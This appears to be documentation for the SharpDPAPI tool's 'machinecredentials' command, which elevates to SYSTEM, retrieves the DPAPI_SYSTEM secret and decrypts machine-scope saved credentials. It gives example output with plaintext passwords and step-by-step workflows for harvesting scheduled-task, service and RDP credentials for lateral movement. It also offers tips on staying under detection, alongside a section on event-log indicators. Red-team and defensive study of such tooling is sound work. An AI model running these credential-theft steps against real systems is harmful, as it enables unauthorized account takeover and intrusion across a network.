Skip to main content

Overview

The machinecredentials command elevates to SYSTEM, retrieves the DPAPI_SYSTEM LSA secret, decrypts machine masterkeys, and uses them to decrypt all machine-scope Credential Manager files. This reveals credentials for scheduled tasks, services, and system-level saved passwords.
Machine credentials are stored in system profile directories and protected with machine-scope DPAPI, containing high-value credentials for scheduled tasks and service accounts.

Basic Usage

# Decrypt machine credentials (requires elevation)
SharpDPAPI.exe machinecredentials
This command requires elevation (Administrator privileges) to:
  • Elevate to SYSTEM via token duplication
  • Retrieve the DPAPI_SYSTEM LSA secret
  • Access system credential files

How It Works

1

Elevation to SYSTEM

Duplicates a SYSTEM token to elevate privileges
2

DPAPI_SYSTEM Retrieval

Retrieves the DPAPI_SYSTEM LSA secret
3

Masterkey Decryption

Decrypts all machine DPAPI masterkeys using DPAPI_SYSTEM
4

Credential Discovery

Locates machine credential files in system directories
5

Credential Decryption

Decrypts each credential file using machine masterkeys

Credential File Locations

Machine credentials are stored in: 
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Credentials\
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Credentials\

Example Output

SharpDPAPI.exe machinecredentials
Output: 
[*] Action: Machine DPAPI Credential Triage

[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()

[*] Secret  : DPAPI_SYSTEM
[*]    full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*]    m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3

[*] SYSTEM master key cache:

{1e76e1ee-1c53-4350-9a3d-7dec7afd024a}:4E4193B4C4D2F0420E0656B5F83D03754B565A0C
{0bd732d9-c396-4f9a-a69a-508632c05235}:8A9F2C1D3E4B5C6A7D8E9F0A1B2C3D4E5F6A7B8C

[*] Triaging System Credentials

Folder       : C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

  CredFile           : C73A55F92FAE222C18A8989FEA28A1FE

    guidMasterKey    : {1cb83cb5-96cd-445d-baac-49e97f4eeb72}
    size             : 544
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782/26128
    description      : Local Credential Data

    LastWritten      : 3/24/2019 7:08:43 PM
    TargetName       : Domain:batch=TaskScheduler:Task:{B745BF75-D62D-4B1C-84ED-F0437214ECED}
    TargetAlias      :
    Comment          :
    UserName         : TESTLAB\harmj0y
    Credential       : Password123!


Folder       : C:\WINDOWS\ServiceProfiles\LocalService\AppData\Local\Microsoft\Credentials

  CredFile           : DFBE70A7E5CC19A398EBF1B96859CE5D

    guidMasterKey    : {0bd732d9-c396-4f9a-a69a-508632c05235}
    size             : 412
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782/26128
    description      : Local Credential Data

    LastWritten      : 5/15/2019 9:22:11 AM
    TargetName       : Domain:target=TERMSRV/10.10.10.50
    TargetAlias      :
    Comment          :
    UserName         : DOMAIN\service_account
    Credential       : P@ssw0rd!

Types of Machine Credentials Found

TargetName: Domain:batch=TaskScheduler:Task:{GUID}
  • Credentials for tasks running as specific users
  • Domain and local account passwords
  • Service account credentials
  • Automated job credentials
Why Valuable:
  • Often domain admin or privileged accounts
  • Used for administrative automation
  • Long-lived credentials
Various TargetNames
  • Windows service account passwords
  • Application pool identities
  • Background process credentials
  • System service accounts
Why Valuable:
  • Elevated privileges common
  • Network access credentials
  • Database access accounts
TargetName: Domain:target=TERMSRV/HOSTNAME
  • Saved Remote Desktop passwords
  • System-level RDP credentials
  • Service account RDP access
  • Jump box credentials
Why Valuable:
  • Lateral movement credentials
  • Administrative access
  • Server-to-server connections
TargetName: Various network targets
  • Network share credentials
  • SQL Server connections
  • Web service authentication
  • API credentials
Why Valuable:
  • Network resource access
  • Database credentials
  • Internal service accounts

Common Scenarios

After gaining admin access:
# Extract machine credentials
SharpDPAPI.exe machinecredentials

# Look for high-value credentials:
# - Scheduled tasks (Domain:batch=TaskScheduler)
# - RDP connections (TERMSRV)
# - Service accounts
# - Network resource access
Find and correlate task credentials:
# 1. Extract credentials
SharpDPAPI.exe machinecredentials

# 2. List scheduled tasks
schtasks /query /fo LIST /v

# 3. Correlate task GUIDs with credentials
# Look for TargetName: Domain:batch=TaskScheduler:Task:{GUID}

# 4. Find task details
schtasks /query /tn "\Task\Name" /v
Identify service credentials:
# 1. Extract machine credentials
SharpDPAPI.exe machinecredentials

# 2. Enumerate services
sc.exe query state= all

# 3. Check service configurations
sc.exe qc ServiceName

# 4. Correlate service accounts with found credentials
Collect credentials for lateral movement:
# Extract credentials
SharpDPAPI.exe machinecredentials

# Test discovered credentials:
# - RDP access (TERMSRV entries)
# - Network shares
# - Remote services
# - Database connections

Credential Flags

The flags field indicates protection scope:
FlagValueDescription
CRYPTPROTECT_SYSTEM0x20000000System credential protection
CRYPTPROTECT_UI_FORBIDDEN0x1No UI prompts allowed
CRYPTPROTECT_LOCAL_MACHINE0x4Machine-scope protection
Machine credentials typically have the CRYPTPROTECT_SYSTEM flag (0x20000000).

Scheduled Task GUID Correlation

Match credential GUIDs to tasks: 
# Get all scheduled tasks with GUIDs
Get-ScheduledTask | ForEach-Object {
    $task = $_
    $info = Get-ScheduledTaskInfo -TaskName $task.TaskName -ErrorAction SilentlyContinue
    [PSCustomObject]@{
        Name = $task.TaskName
        Path = $task.TaskPath
        User = $task.Principal.UserId
        LastRun = $info.LastRunTime
        NextRun = $info.NextRunTime
    }
}

# Find task by GUID from credential TargetName
# The GUID is in format: Task:{GUID}

Detection Considerations

Machine credential extraction is a high-privilege operation that should trigger security monitoring.
Host-Based Indicators:
  • Elevation to SYSTEM privileges
  • LSA secret retrieval (DPAPI_SYSTEM)
  • Access to system profile credential directories
  • Bulk credential file reading
  • Token duplication activity
Event Log Indicators: 
Event ID: 4624 (Logon)
Logon Type: 3 (Network)
Account Name: SYSTEM

Event ID: 4656/4663 (Object Access)
Object Name: *\SystemProfile\AppData\Local\Microsoft\Credentials\*
Object Name: *\ServiceProfiles\*\Credentials\*
Object Name: LSA Secrets

Event ID: 4673 (Privileged Service Called)
Privileges: SeDebugPrivilege, SeImpersonatePrivilege
Defensive Monitoring:
  • Monitor SYSTEM token impersonation
  • Alert on LSA secret access (DPAPI_SYSTEM)
  • Track access to system credential directories
  • Detect bulk credential file enumeration
  • Monitor SharpDPAPI or similar tool execution

machinemasterkeys

Extract machine masterkeys first

machinevaults

Decrypt machine vault data

machinetriage

Comprehensive machine DPAPI triage

credentials

Decrypt user credentials

Tips

  • Focus on scheduled task credentials (often privileged)
  • Correlate task GUIDs with task details
  • Test RDP credentials immediately
  • Check service account privileges
  • Look for domain accounts vs local
  • Requires elevation (high visibility)
  • SYSTEM privilege elevation generates events
  • LSA secret access triggers alerts
  • Consider timing and detection capabilities
  • May trigger EDR behavioral detections
Access denied:
  • Need Administrator privileges
  • UAC may block elevation
  • Security software may prevent SYSTEM access
  • Try running as SYSTEM directly
No credentials found:
  • System may not have saved machine credentials
  • Credentials may be in vault instead
  • Check ServiceProfiles directories
  • Scheduled tasks may use group policy credentials
Partial decryption:
  • Some credentials may use different masterkeys
  • Verify DPAPI_SYSTEM was retrieved correctly
  • Check all system profile directories

Correlating with System Activity

Scheduled Tasks: 
# View task details with credentials
Get-ScheduledTask | Where-Object {$_.Principal.UserId -ne "SYSTEM"} |
  Select-Object TaskName, @{N='User';E={$_.Principal.UserId}}
Windows Services: 
# Services running as domain accounts
Get-WmiObject Win32_Service |
  Where-Object {$_.StartName -like "*\*" -and $_.StartName -ne "LocalSystem"} |
  Select-Object Name, DisplayName, StartName, State
Process Credentials: 
# Processes running as specific accounts
Get-Process -IncludeUserName |
  Where-Object {$_.UserName -like "*\*"} |
  Group-Object UserName |
  Select-Object Name, Count

Understanding Credential Context

Machine credentials are saved when:
  1. Scheduled Task Creation:
    • Task configured to run as specific user
    • Password saved in Credential Manager
    • Protected with machine masterkey
  2. Service Installation:
    • Service configured with service account
    • Credentials stored for service startup
    • Machine-scope DPAPI protection
  3. System-Level Operations:
    • Administrative tools saving credentials
    • Backup software credentials
    • Monitoring tools
    • Remote management tools